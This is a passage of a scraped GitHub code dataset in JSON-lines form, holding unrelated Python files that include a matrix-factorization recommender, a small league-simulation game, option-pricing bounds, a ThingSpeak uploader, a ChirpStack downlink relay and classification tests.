inicializarán los valores de las matrices\n # teniendo en cuenta la recomendación dada en el paper y el noise dado por parámetro\n k = self.n_factors\n g = trainset.global_mean\n init_base = math.sqrt((g - r_min)/(k * (r_max - r_min))) + self.noise\n self.init_low = init_base - self.noise\n if self.init_low < 0:\n self.init_low = 0\n self.init_high = init_base + self.noise\n\n\n def sgd(self, trainset):\n \"\"\"Implementación de SGD para realizar la factorización de la matriz de utilidad\"\"\"\n rng = np.random.mtrand._rand\n # Se inicializa la matriz de usuarios y la matriz de ítems con valores aleatorios\n # en el intervalo definido anteriormente\n pu = rng.uniform(self.init_low, self.init_high, size=(trainset.n_users, self.n_factors))\n qi = rng.uniform(self.init_low, self.init_high, size=(trainset.n_items, self.n_factors))\n for epoch in range(self.n_epochs):\n print(\"Procesando epoch #\" + str(epoch))\n # Se ajustan los valores de la matriz el número de epochs definidos por parámetro\n for user, item, rating in trainset.all_ratings():\n # Se calcula el producto punto entre el vector\n # correspondiente al usuario e ítem actual en la iteración\n dot = np.dot(pu[user], qi[item])\n # Se calcula el estimado actual para\n # el rating del usuario al ítem a + c * K(w_u, h_i)\n estimate = self.kernel_a + self.kernel_c * dot\n for factor in range(self.n_factors):\n # Se calcula la derivada parcial con respecto a w_u,f\n pd_pu = (estimate - rating) * qi[item, factor] + self.reg * pu[user, factor]\n # Se calcula la derivada parcial con respecto a h_i,f\n pd_qi = (estimate - rating) * pu[user, factor] + self.reg * qi[item, factor]\n\n # Se actualiza el valor de w_u,f y h_i,f con non-negative restriction\n pu[user, factor] = max(0, pu[user, factor] - self.lr * pd_pu)\n qi[item, factor] = max(0, qi[item, factor] - self.lr * pd_qi)\n self.pu = pu\n self.qi = qi\n\n\n def estimate(self, user, item):\n \"\"\"Estima el rating que un usuario dará a un ítem\"\"\"\n known_user = self.trainset.knows_user(user)\n known_item = self.trainset.knows_item(item)\n est = self.trainset.global_mean\n if known_user and known_item:\n est = self.kernel_a + self.kernel_c * np.dot(self.qi[item], self.pu[user])\n else:\n raise PredictionImpossible(\"User and item are unknown.\")\n return est\n\n\n def user_update(self, user_id, item_id, rating):\n \"\"\"Actualiza el vector de un usuario al recibir la información de un rating nuevo\"\"\"\n # Se obtiene el usuario y el ítem del trainset\n user = self.get_user(user_id)\n item = self.get_item(item_id)\n # Se añade el nuevo rating al trainset\n self.add_rating(user, item, rating)\n # Se obtienen los ratings que ha dado el usuario hasta el momento\n user_ratings = self.trainset.ur[user]\n\n # El vector del usuario en la matriz de usuarios x factores se reinicializa\n rng = np.random.mtrand._rand\n pu_user = rng.uniform(self.init_low, self.init_high, size=(self.n_factors))\n for epoch in range(self.n_epochs):\n # Se ajustan del vector del usuario el número de epochs definidos por parámetro\n print(\"Procesando epoch #\" + str(epoch))\n for item_loop, rating_loop in user_ratings:\n # Se hace SGD por cada rating que el usuario ha dado\n # Se calcula el producto punto entre el vector\n # correspondiente al usuario e ítem actual en la iteración\n dot = np.dot(pu_user, self.qi[item_loop])\n # Se calcula el estimado actual para\n # el rating del usuario al ítem a + c * K(w_u, h_i)\n estimate = self.kernel_a + self.kernel_c * dot\n for factor in range(self.n_factors):\n # Se calcula 
la derivada parcial con respecto a w_u,f\n pd_pu = (estimate - rating_loop) * self.qi[item_loop, factor] + self.reg * pu_user[factor]\n # Se actualiza el valor de w_u,f con non-negative restriction\n pu_user[factor] = max(0, pu_user[factor] - self.lr * pd_pu)\n # Se actualiza el vector del usuario en la matriz\n self.pu[user] = pu_user\n\n\n def get_user(self, user_id):\n \"\"\"Obtiene el inner_id del usuario dado como parámetro\"\"\"\n try:\n # Se trata de buscar el inner_id del usuario en el trainset\n user = self.trainset.to_inner_uid(str(user_id))\n return user\n except ValueError:\n # Si el usuario no tiene inner_id se le asigna el que seguiría,\n # es decir, el número de usuarios ya en el trainset\n user = self.trainset.n_users\n # Se asigna al raw id el inner id correspondiente\n self.trainset._raw2inner_id_users[user_id] = user\n # Se aumenta el número de usuarios en el trainset\n self.trainset.n_users += 1\n # Se crea un vector para el usuario y se agrega a la matriz de usuarios x factores\n rng = np.random.mtrand._rand\n pu_user = rng.uniform(self.init_low, self.init_high, size=(self.n_factors))\n self.pu = np.vstack((self.pu, pu_user))\n return user\n\n\n def get_item(self, item_id):\n \"\"\"Obtiene el inner_id del ítem dado como parámetro\"\"\"\n try:\n # Se trata de buscar el inner_id del ítem en el trainset\n item = self.trainset.to_inner_iid(str(item_id))\n return item\n except ValueError:\n # Si el ítem no tiene inner_id se le asigna el que seguiría,\n # es decir, el número de ítems ya en el trainset\n item = self.trainset.n_items\n # Se asigna al raw id el inner id correspondiente\n self.trainset._raw2inner_id_items[item_id] = item\n # Se aumenta el número de ítems en el trainset\n self.trainset.n_items += 1\n # Se crea un vector para el ítem y se agrega a la matriz de ítems x factores\n rng = np.random.mtrand._rand\n qi_item = rng.uniform(self.init_low, self.init_high, size=(self.n_factors))\n self.qi = np.vstack((self.qi, qi_item))\n return item\n\n \n def add_rating(self, user, item, rating):\n \"\"\"Añade un nuevo rating de un usuario a un ítem al training set\"\"\"\n # Se añade el rating a la lista de ratings del usuario\n self.trainset.ur[user].append((item, rating))\n # Se añade el rating a la lista de ratings del ítem\n self.trainset.ir[item].append((user, rating))\n # Se aumenta la cantidad de ratings en 1\n self.trainset.n_ratings += 1\n","repo_name":"cfagudelo96/SistemasRecomendacionG1T3","sub_path":"rkmf_algorithm.py","file_name":"rkmf_algorithm.py","file_ext":"py","file_size_in_byte":9785,"program_lang":"python","lang":"es","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"20618291761","text":"\nmi_path = 'supermarket/Mi_6'\nsam_path = 'supermarket/Samsung_C5Pro'\nMNIST_ROOT = './mnist/'\n\nEPOCH = 50\nBATCH_SIZE = 1\nHIDDEN_SIZE = 64\nTIME_STEP = 10\nINPUT_SIZE = 3\nOUTPUT_SIZE = 2\nLR = 0.1\nCLA_COUNT = 100\n\n\ndef show_img(img, title):\n plt.imshow(img, cmap='gray')\n plt.title(title)\n plt.show()\n\n\n'''\nDOWNLOAD_MNIST = True\nMNIST_ROOT = './mnist/'\nif not(os.path.exists(MNIST_ROOT)) or not os.listdir(MNIST_ROOT):\n DOWNLOAD_MNIST = True\n\ntrain_data = torchvision.datasets.MNIST(\n root=MNIST_ROOT,\n train=True,\n transform=torchvision.transforms.ToTensor(),\n download=DOWNLOAD_MNIST\n)\n\ntest_data = torchvision.datasets.MNIST(root=MNIST_ROOT, train=False)\n\ntrain_loader = data.DataLoader(dataset=train_data, batch_size=BATCH_SIZE, shuffle=True)\n\nTEST_DATA_SIZE = 2000\ntest_x = 
torch.unsqueeze(test_data.test_data[:TEST_DATA_SIZE], dim=1).type(torch.FloatTensor)/255\ntest_y = test_data.test_labels[:TEST_DATA_SIZE]\n\n# steps = np.linspace(0, np.pi * 2, 100, dtype=np.float32) # 0 ~ 2*pi (6.28)\n# x_np = np.sin(steps)\n# y_np = np.cos(steps)\n# show the cos & sin\n# plt.plot(steps, x_np, 'b-', label='input (sin)')\n# plt.plot(steps, y_np, 'r-', label='target (cos)')\n# plt.legend(loc='best')\n# plt.show()\n# print(steps)\n\n\n\n # plotting\n # ylim_value = 1.2\n # x_steps = steps + np.ones(TIME_STEP) * TIME_STEP * (step % CLA_COUNT)\n # clear_flag = False\n # if step % CLA_COUNT == 0:\n # clear_flag = True\n # print(\"hehe\")\n # if clear_flag:\n # plt.cla()\n'''\n\n","repo_name":"asdiijj/Mag","sub_path":"params.py","file_name":"params.py","file_ext":"py","file_size_in_byte":1545,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"39183878318","text":"import Functions as f\nimport statistics_SL as s\nimport season as se\nimport sql_queries as sqlq\n\n# Optimized\n\ndef main():\n while True:\n user_input = f.first_screen() # First screen alows the user to choose between actions\n function_dictionary = {1 :f.create_team, # Create a new team and write it to DB\n 2 :f.create_player, # Create a new player and write it to DB\n 3 :season_screen, # Start new season\n 4 :f.show_all_teams, # Shows all valid teams and players\n 5 :f.show_one_team, # Shows menu of all teams and then players of one team\n 6 :f.drop_player, # User can drop any player from any team\n 7 :f.sign_player, # User can sign any player from free agents to any team\n 8 :f.create_custom_player, # User can sign any player from free agents to any team\n 9 :f.inactivate_team, # User can inactivate team and release it's players to free agents\n 10:f.exit_app # Exits application\n }\n function_dictionary.get(user_input, lambda: None)() # Calls action that user added as input\n\n\ndef season_screen():\n\n start_new_season = True\n games_list = se.make_schedule(10)\n year = 2023\n season_round = 1\n\n if sqlq.check_team_count() != 10: # To start the season we need to have exactly 10 valid teams\n se.wrong_team_count()\n return\n\n if sqlq.check_player_count(): # To start the season each team needs to have 5 valid players\n se.show_teams_above()\n return\n\n if start_new_season: # If we need to start new game with clear DB, clear down Games and Player_scores\n f.reset_season()\n\n function_dictionary = {2:f.trade_players, # Trade players between teams\n 3:f.drop_player, # Drops player from team to free agents\n 4:f.sign_player, # Sign player from free agents to team\n 5:f.show_all_teams # Shows all teams and players\n }\n\n while True:\n\n if season_round == 19: # If 18 rounds are done, let's go to playoffs\n s.mvp(year) # Displays season MVP\n if year > 2023: s.mip(year) # Displays most improved player\n\n print(f\"\\n{year} playoffs!\")\n se.playoffs(year) # starts playoffs\n se.mvp_growth(year) # Increase Offence and Defence for MVP\n se.player_development() # Changes Offence and defence based on potential, potential based on age\n se.random_development() # Increases all stats by 10 for one random player\n se.draft(year) # Creates new players and starts draft\n season_round = 1\n year += 1\n start_new_season = False\n\n print(f\"\\n{year} season, round {season_round}:\")\n user_input = f.season_menu() # season screen alows the user to choose between actions\n\n if user_input == 1: # Simulates games of one round and displays results\n 
se.play_round(games_list[season_round-1], year) #\n season_round += 1 # \n\n elif user_input == 6: # break back to main screen\n break\n\n else:\n function_dictionary[user_input]() # Action from function dictionary\n\n\nif __name__ == '__main__':\n main()\n\n\n\n\n# Current To-Do list: \n\n# Test and fix draft\n# need to add validation after draft that all teams has only 5 players or change the logic to play 5 best players (This sounds better)\n# How to display historic results\n# Start a new game or continue previous one (new game would drop data in Games and Player_Score tables) - test start_new_season\n# Create an option to activate back team \n","repo_name":"KGrants/Simple-Games","sub_path":"SundayLeague/SundayLeague/SundayLeague.py","file_name":"SundayLeague.py","file_ext":"py","file_size_in_byte":4413,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"4361981542","text":"class Solution(object):\n # 执行时间为664ms的案例\n def ladderLength_1(self, beginWord, endWord, wordList):\n \"\"\"\n :type beginWord: str\n :type endWord: str\n :type wordList: List[str]\n :rtype: int\n \"\"\"\n distance, cur, visited, lookup = 0, [\n beginWord], set([beginWord]), set(wordList)\n\n while cur:\n next_queue = []\n\n for word in cur:\n if word == endWord:\n return distance + 1\n for i in range(len(word)):\n for j in 'abcdefghijklmnopqrstuvwxyz':\n candidate = word[:i] + j + word[i + 1:]\n if candidate not in visited and candidate in lookup:\n next_queue.append(candidate)\n visited.add(candidate)\n distance += 1\n cur = next_queue\n\n return 0\n # 执行时间为108ms的案例\n def ladderLength_2(self, beginWord, endWord, wordList):\n\n wordSet = set(wordList)\n headQ = set([beginWord])\n tailQ = set([endWord])\n step = 1\n\n if endWord not in wordSet:\n return 0\n else:\n wordSet.discard(endWord)\n\n while headQ:\n step += 1\n currSet = set()\n for word in headQ:\n for i in range(len(word)):\n p1 = word[:i]\n p2 = word[i + 1:]\n for c in \"abcdefghijklmnopqrstuvwxyz\":\n new = p1 + c + p2\n if new in tailQ:\n return step\n if new in wordSet:\n currSet.add(new)\n wordSet.remove(new)\n\n headQ = currSet\n if len(headQ) > len(tailQ):\n headQ, tailQ = tailQ, headQ\n\n return 0\n","repo_name":"haitwang-cloud/leetCode_Python","sub_path":"Word-Ladder.py","file_name":"Word-Ladder.py","file_ext":"py","file_size_in_byte":1919,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"8820796457","text":"def main():\n day = eval(input(\"Enter today's day: \"))\n elapsed = eval(input(\"Enter the number of days elapsed since today: \"))\n future = day + (elapsed % 7)\n if day == 0:\n day = 'Sunday'\n elif day == 1:\n day = 'Monday'\n elif day == 2:\n day = 'Tuesday'\n elif day == 3:\n day = 'Wednesday'\n elif day == 4:\n day = 'Thursday'\n elif day == 5:\n day = 'Friday'\n elif day == 6:\n day = 'Saturday'\n if future == 0:\n future = 'Sunday'\n elif future == 1:\n future = 'Monday'\n elif future == 2:\n future = 'Tuesday'\n elif future == 3:\n future = 'Wednesday'\n elif future == 4:\n future = 'Thursday'\n elif future == 5:\n future = 'Friday'\n elif future == 6:\n future = 'Saturday'\n\n print ('Today is', day, 'and the future day is', future)\nmain()\n","repo_name":"juanitotaveras/CS301_Intro_to_Programming","sub_path":"futuredate.py","file_name":"futuredate.py","file_ext":"py","file_size_in_byte":877,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} 
+{"seq_id":"31313094337","text":"import sys, pdb\nsys.path.append(\"/home/ubuntu/workspace/python_for_finance\")\nsys.path.append(\"/usr/local/lib/python2.7/dist-packages\")\n# sys.path.append(\"/usr/local/lib/python3.4/dist-packages\")\n# import matplotlib as mpl\n# mpl.use('Agg')\n# import matplotlib.pyplot as plt\n\nfrom dx import *\nfrom utils.utils import *\n\nimport numpy as np\n# import pandas as pd\nimport datetime as dt\n\n\ndef euro_call_bounds(stock_px, strike, settle_dt, mat_dt, r, divs=0):\n delta_t = get_year_deltas([settle_dt, mat_dt])[-1]\n mx = stock_px\n mn = max(stock_px - divs - strike * np.exp((-1) * r * delta_t), 0)\n return (mx, mn)\n\n\ndef euro_put_bounds(stock_px, strike, settle_dt, mat_dt, r, divs=0):\n delta_t = get_year_deltas([settle_dt, mat_dt])[-1]\n mx = strike * np.exp((-1) * r * delta_t)\n mn = max(divs + strike * np.exp((-1) * r * delta_t) - stock_px, 0)\n return (mx, mn)\n \n\ndef amer_call_bounds(stock_px, strike, settle_dt, mat_dt, r, divs=0):\n delta_t = get_year_deltas([settle_dt, mat_dt])[-1]\n mx = stock_px\n mn = max(stock_px - strike * np.exp((-1) * r * delta_t), 0)\n return (mx, mn)\n \n\ndef amer_put_bounds(stock_px, strike, settle_dt, mat_dt, r, divs=0):\n mx = strike\n mn = max(strike * np.exp((-1) * r * delta_t) - stock_px, 0)\n return (mx, mn)\n\n\ndef put_call_parity(opt_px, under_px, strike, r, settle_dt, mat_dt, p_c='c', divs=0):\n delta_t = get_year_deltas([settle_dt, mat_dt])[-1]\n if p_c == 'c':\n return opt_px + under_px - divs - (strike * np.exp((-1) * r * delta_t))\n else:\n return opt_px + (strike * np.exp((-1) * r * delta_t)) + divs - under_px\n\n\nif __name__ == '__main__':\n # print(euro_call_bounds(20, 18, dt.datetime(2015,1,1), dt.datetime(2016,1,1), 0.1))\n # print(euro_put_bounds(37, 40, dt.datetime(2015,1,1), dt.datetime(2015,7,1), 0.05))\n print(put_call_parity(2.25, 31, 30, 0.10, dt.datetime(2015,1,1), dt.datetime(2015,4,1), 'c'))","repo_name":"mccarvik/python_for_finance","sub_path":"books/hull_examples/props_of_options.py","file_name":"props_of_options.py","file_ext":"py","file_size_in_byte":1923,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"71861658409","text":"import os\nimport sys\nimport logging\nimport random\nimport datetime\nimport json\n\nfrom logging.handlers import RotatingFileHandler\n\n\ndef get_logger():\n logs_folder_path = os.getenv('LOGS_FOLDER_PATH')\n app_name = os.getenv('APP_NAME')\n\n if not os.path.isdir(logs_folder_path):\n os.mkdir(logs_folder_path)\n log_file_path = logs_folder_path + '/' + app_name + '.log'\n if not os.path.isfile(log_file_path):\n log_file = open(log_file_path, \"a\")\n log_file.close()\n\n logger = logging.getLogger(app_name)\n logger.setLevel('DEBUG')\n\n log_format = logging.Formatter(\"%(asctime)s | %(name)s | %(levelname)s | %(message)s\")\n\n console_handler = logging.StreamHandler(sys.stdout)\n console_handler.setFormatter(log_format)\n logger.addHandler(console_handler)\n\n file_handler = RotatingFileHandler(log_file_path, maxBytes=(1048576 * 5), backupCount=5)\n file_handler.setFormatter(log_format)\n logger.addHandler(file_handler)\n\n logger.info('logger created')\n logger.info('starting ' + app_name + '...')\n\n return logger\n\n\ndef get_day(logger):\n logger.info('getting day...')\n\n now = datetime.datetime.now()\n\n return now.day\n\n\ndef get_year(logger):\n logger.info('getting year...')\n\n now = datetime.datetime.now()\n\n return now.year\n\n\ndef get_aotd(logger, day, year):\n 
logger.info('getting album of the day...')\n\n json_folder = os.getenv('JSON_FOLDER')\n\n with open(json_folder + '/' + str(year) + '.json') as albums_json:\n data = json.load(albums_json)\n for album in data:\n if album['day'] == day:\n return album\n\n return None\n","repo_name":"gaizkadc/metal-december","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1642,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"14780978354","text":"from polygon import RESTClient\nimport polygon\nfrom dotenv import load_dotenv\nimport os\nimport pandas as pd\nfrom tqdm import tqdm\n\nenv = load_dotenv('/Users/syyun/Dropbox (MIT)/efd/.env')\napi_key = os.getenv(\"POLYGON_APIKEY\")\nprint(api_key)\nclient = RESTClient(api_key=api_key)\n\nfrom octopus.db import PostgresqlManager\npm = PostgresqlManager(dotenv_path=\"/Users/syyun/Dropbox (MIT)/efd/.env\")\ndf = pm.execute_sql(fetchall=True, sql=\n \"\"\"\n with target as (\n select distinct sb.ticker, trans_date, vwap from senate_annual_4a sb\n inner join senate_annual sa on sa.report_type_url = sb.report_url\n left join price p on (p.ticker = sb.ticker and trans_date =p.\"date\")\n where vwap is null and sb.ticker is not null\n )\n select ticker, trans_date from target\n where (ticker, trans_date, vwap) not in (select ticker, date as trans_date, vwap from price p where vwap is null) \"\"\"\n )\nsql_insert = \"\"\"\nINSERT INTO price(ticker, date, vwap)\nVALUES(%s, %s, %s)\n\"\"\"\n\nticker = \"AAPL\"\ndate = \"2020-01-01\"\nfor ticker, date in tqdm(df): # name and ticker pairs\n # get price\n try:\n bars = client.get_aggs(ticker=ticker, multiplier=1, timespan=\"day\", from_=date, to=date)\n vwap = bars[0].vwap\n\n pm.execute_sql(\n sql=sql_insert,\n parameters=(\n ticker,\n date,\n vwap,\n ),\n commit=True,\n )\n except polygon.exceptions.NoResultsError as e:\n \n vwap = None\n pm.execute_sql(\n sql=sql_insert,\n parameters=(\n ticker,\n date,\n vwap,\n ),\n commit=True,\n )\n pass\n ","repo_name":"syyunn/efd","sub_path":"apis/plgn/price.py","file_name":"price.py","file_ext":"py","file_size_in_byte":1978,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"37476446481","text":"def solution(participant, completion):\n participant_dict = dict(zip(participant, [0]*len(participant)))\n for name in participant:\n participant_dict[name] += 1\n \n for name in completion:\n participant_dict[name] -= 1\n \n for player, num in participant_dict.items():\n if num == 1:\n return player\n\n\"\"\"\n문제주소 : https://programmers.co.kr/learn/courses/30/lessons/42576\n시간 : 15분\n\n- 효율성 테스트가 중요헀던 문제로\n- list의 remove는 초과\n- set을 이용한 반복문 내 in 초과\n\n\n\n다른 사람 풀이 :\n========================================================================================\nCounter 이용\n\nimport collections\n\ndef solution(participant, completion):\n answer = collections.Counter(participant) - collections.Counter(completion)\n return list(answer.keys())[0]\n========================================================================================\nCounter 이용2\nfrom collections import Counter\ndef solution(participant, completion):\n\n inter = list((Counter(participant) - Counter(completion)).elements())\n\n return inter.pop()\n========================================================================================\n\n노트 :\n- https://dev.plusblog.co.kr/42 살펴보기\n- https://wiki.python.org/moin/TimeComplexity 살펴보기\n- 파이썬 Counter 
찾아보기\n\"\"\"","repo_name":"Tao-Kim/study_algo","sub_path":"programmers/p8_42576_완주하지못한선수.py","file_name":"p8_42576_완주하지못한선수.py","file_ext":"py","file_size_in_byte":1379,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19157866552","text":"import time\nimport sqlite3 # python3 -m pip install sqlite3\nimport urllib3 # python3 -m pip install urllib3\n\nhttp = None\n\nkeys = {\n 'ldr': 'TBD',\n 'tmp': 'TBD',\n 'hum': 'TBD'\n}\n\ndef send(data):\n api_key = keys[data[0]]\n\n r = http.request(\n 'GET', \n 'https://api.thingspeak.com/update?api_key={}&field1={}'.format(api_key, data[1])\n )\n\n if r.status != 200:\n print('Some error sending data')\n\nif __name__ == '__main__':\n con = sqlite3.connect('sedu.db')\n cur = con.cursor()\n\n http = urllib3.PoolManager()\n\n try:\n while True:\n \n for row in cur.execute('SELECT id, value, time FROM sensors'):\n if row and row[0] != 'cks':\n print(row)\n send(row)\n con.execute('delete from sensors where id=\"{}\" and value={} and time=\"{}\"'.format(row[0],row[1], row[2]))\n\n con.commit()\n time.sleep(1)\n except(KeyboardInterrupt, e):\n print('Program stopped')\n con.close()\n\n \n \n","repo_name":"serrodcal-MII/SEDU","sub_path":"m8/thing_speak.py","file_name":"thing_speak.py","file_ext":"py","file_size_in_byte":1053,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"24991710008","text":"from playwright.sync_api import Page, expect\nimport pytest\n\n\n@pytest.fixture()\ndef home_page(page: Page) -> Page:\n page.set_default_timeout(5000)\n page.goto(\"http://127.0.0.1:8000\", timeout=3000, wait_until=\"load\")\n return page\n\n\ndef test_example_is_working(home_page: Page):\n assert home_page.inner_text(\"h1\") == \"Organizations\"\n\n\ndef test_create_organization(home_page: Page):\n assert home_page.inner_text(\"#orgs\\.counter\") == \"0\"\n\n home_page.locator('[placeholder=\"Organization name\"]').fill(\"Henkel\")\n home_page.locator('[placeholder=\"Organization name\"]').press(\"Enter\")\n\n assert home_page.inner_text(\"#orgs\\.counter\") == \"1\"\n\n home_page.locator('[data-org_delete_name=\"Henkel\"]').click()\n\n expect(home_page.locator(\"#orgs\\.counter\")).to_have_text(\"0\")\n","repo_name":"talebisinan/fastapi-htmx","sub_path":"tests/test_main.py","file_name":"test_main.py","file_ext":"py","file_size_in_byte":788,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"337389258","text":"#!/usr/bin/env python3\n\nimport sys\nimport argparse\nfrom flask import Flask\nfrom flask import request\nfrom flask import Response\nimport pprint\nimport json\nimport binascii\n\nimport socket\nimport select\nimport time\nimport base64\n\nimport requests\n\napp = Flask(__name__)\napp.debug = True\n\nsock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\nprint('socket:', sock)\n\n@app.route('/TTN', methods=['POST'])\ndef get_from_chirpstack():\n import secret as secret\n\n #print (secret.server)\n #fromGW = request.get_json(force=True)\n #print (request.environ.get('REMOTE_PORT'))\n #pprint.pprint (fromGW)\n\n #downlink = None\n downlink = b\"downkink test test downkink test\"\n #if \"data\" in fromGW:\n #payload = base64.b64decode(fromGW[\"data\"])\n #downlink = forward_data(payload)\n #print (fromGW[\"fPort\"])\n\n if downlink != None:\n answer = {\n \"deviceQueueItem\": {\n\t\t \"data\": base64.b64encode(downlink).decode('utf-8'),\n \"fPort\": 3,\n }\n }\n pprint.pprint 
(answer)\n dev_eui = '1664a21ba532711d'\n #device = binascii.hexlify(base64.b64decode(fromGW[\"devEUI\"])).decode()\n downlink_url = secret.server+'/api/devices/'+dev_eui+'/queue'\n print (downlink_url)\n headers = {\n \"content-type\": \"application/json\",\n \"grpc-metadata-authorization\" : \"Bearer \"+ secret.key\n }\n print (headers)\n x = requests.post(downlink_url, data = json.dumps(answer), headers=headers)\n print(x)\n\n\n resp = Response(status=200)\n return resp\n\n parser = argparse.ArgumentParser()\n parser.add_argument(\"-v\", \"--verbose\",\n action=\"store_true\",\n help=\"show uplink and downlink messages\")\n parser.add_argument('--http_port', default=9999,\n help=\"set http port for POST requests\")\n parser.add_argument('--forward_port', default=33033,\n help=\"port to forward packets\")\n parser.add_argument('--forward_address', default='127.0.0.1',\n help=\"IP address to forward packets\")\n\n args = parser.parse_args()\n verbose = args.verbose\n defPort = args.http_port\n forward_port = args.forward_port\n forward_address = args.forward_address\n\n app.run(host=\"0.0.0.0\", port=defPort)\n\nwhile True:\n get_from_chirpstack()\n time.sleep(30)\n","repo_name":"openschc/openschc","sub_path":"examples/scapy/relay_chirp.py","file_name":"relay_chirp.py","file_ext":"py","file_size_in_byte":2418,"program_lang":"python","lang":"en","doc_type":"code","stars":24,"dataset":"github-code","pt":"53"} +{"seq_id":"42354317632","text":"\"\"\"\nEjercicio 2.2.8\nEscribir un programa que pida al usuario un número entero y muestre por pantalla un triángulo\nrectángulo como el de más abajo.\n1\n3 1\n5 3 1\n7 5 3 1\n9 7 5 3 1\n\"\"\"\n\n\ndef piramNum (num: int):\n cont = 1\n while (num > 1):\n cont += 2\n num -=1\n for i in range(1, cont + 1, 2):\n print(\"\")\n for j in range(i, 0, -2):\n print(\"{j} \".format(j = j), end = \"\")\n return \"\"\n \n \ndef main():\n numer = int(input(\"Dime un número: \"))\n print(piramNum(numer))\n \n\nif __name__ == '__main__':\n main()","repo_name":"IES-Rafael-Alberti/1dawb-ejercicios-u2-ManuelAmayaOrozco","sub_path":"src/ejercicio2_18.py","file_name":"ejercicio2_18.py","file_ext":"py","file_size_in_byte":572,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"73248564007","text":"n = int(input())\nans = 0\nmaxi = 0\nfor i in range(1, n + 1):\n here = n\n stp = 0\n for j in range(i):\n check = (i - j) * (j + 1)\n if here - check > 0:\n stp += 1\n here -= check\n else:\n break\n if stp > maxi:\n maxi = stp\n ans = i\nif n == 1:\n print(1)\nelse:\n print(ans)\n","repo_name":"asalybek/ICT-Python-","sub_path":"final/2.py","file_name":"2.py","file_ext":"py","file_size_in_byte":349,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"37179930425","text":"from numpy import zeros\n\nprint('[Generating data...]\\n')\n\nnsteps = round(200/dt)\nx = true_m0\nX = zeros(x.shape[0],nsteps)\nY = zeros(2,nsteps)\nT = zeros(1,nsteps)\n\nC = zeros(1,nsteps)\nt = 0\nfor k in range(nsteps):\n\tddt = dt / sim_iter\n\tfor i in range(sim_iter):\n\t\tA = reentry_df_dx(x, [ddt, b0, H0, Gm0, R0])\n\t\tx = reentry_f(x, [ddt, b0, H0, Gm0, R0])\n\n\tc = cond(A)\n\t\n\tt += dt\n\tC[k] = c\n\tT[k] = t","repo_name":"sursu/Bayesian-Filtering","sub_path":"EKFUKF_Py/demo/reentry_demo/reentry_cond.py","file_name":"reentry_cond.py","file_ext":"py","file_size_in_byte":395,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"53"} 
+{"seq_id":"15442454731","text":"import pandas as pd\nfrom blitzml.tabular import Classification\nimport pytest\n\ntrain_df = pd.read_csv(\"auxiliary/datasets/banknote/train.csv\")\ntest_df = pd.read_csv(\"auxiliary/datasets/banknote/test.csv\")\n\n\ndef test_using_cross_validation():\n auto = Classification(\n train_df,\n test_df,\n algorithm='RF',\n cross_validation_k_folds = 5\n )\n auto.run()\n assert len(auto.metrics_dict['cross_validation_score']) == 5\n assert auto.metrics_dict['accuracy'] > 0 \n\ndef test_using_train_validation_curve():\n auto = Classification(\n train_df,\n test_df,\n algorithm='RF',\n )\n auto.run()\n assert auto.metrics_dict['accuracy'] > 0 \n assert len(auto.accuracy_history()['y1'])>0\n\n\ndef test_validation_percent_greater_than_90_percent_fail():\n with pytest.raises(AssertionError):\n auto = Classification(\n train_df,\n test_df,\n algorithm='RF',\n validation_percentage = 0.91\n )\n auto.run()\n\ndef test_different_feature_selection_modes():\n modes = [\"importance\", \"correlation\", \"none\"]\n for mode in modes:\n auto = Classification(\n train_df,\n test_df,\n algorithm='RF',\n feature_selection = mode\n )\n auto.run()\n assert auto.metrics_dict['accuracy'] > 0 \ndef test_train_dataset_without_target_column_fails():\n with pytest.raises(AssertionError):\n auto = Classification(\n train_df.drop('class', axis = 1),\n test_df,\n algorithm='RF'\n )\n auto.run()\n \ndef test_classifiers():\n classifier_list = [\"RF\",\"LDA\",\"SVC\",\"KNN\",\"GNB\",\"LR\",\"AB\",\"GB\",\"DT\",\"MLP\"]\n for classifier in classifier_list:\n auto = Classification(\n train_df,\n test_df,\n algorithm=classifier\n )\n auto.run()\n assert auto.metrics_dict['accuracy'] > 0\n\ndef test_using_auto_classifier():\n auto = Classification(\n train_df,\n test_df,\n algorithm='auto'\n )\n auto.run()\n assert auto.metrics_dict['accuracy'] > 0\n\ndef test_using_different_datasets():\n datasets = ['titanic', 'banknote', 'liqure quality']\n for dataset in datasets:\n train_df = pd.read_csv(f\"auxiliary/datasets/{dataset}/train.csv\")\n test_df = pd.read_csv(f\"auxiliary/datasets/{dataset}/test.csv\")\n auto = Classification(\n train_df,\n test_df,\n algorithm='RF'\n )\n auto.run()\n assert auto.metrics_dict['accuracy'] > 0\n\ndef test_using_custom_classifier():\n auto = Classification(\n train_df,\n test_df,\n algorithm='custom',\n class_name = \"classifier\",\n file_path = \"auxiliary/scripts/dummy.py\",\n )\n auto.run()\n assert auto.metrics_dict['accuracy'] > 0\n\ndef test_using_unsupported_average_type_fails():\n train_df = pd.read_csv(\"auxiliary/datasets/liqure quality/train.csv\")\n test_df = pd.read_csv(\"auxiliary/datasets/liqure quality/test.csv\")\n with pytest.raises(ValueError):\n auto = Classification(\n train_df,\n test_df,\n algorithm='RF',\n average_type = \"cheese\"\n )\n auto.run()\ndef test_using_wrong_custom_classifier_fails():\n with 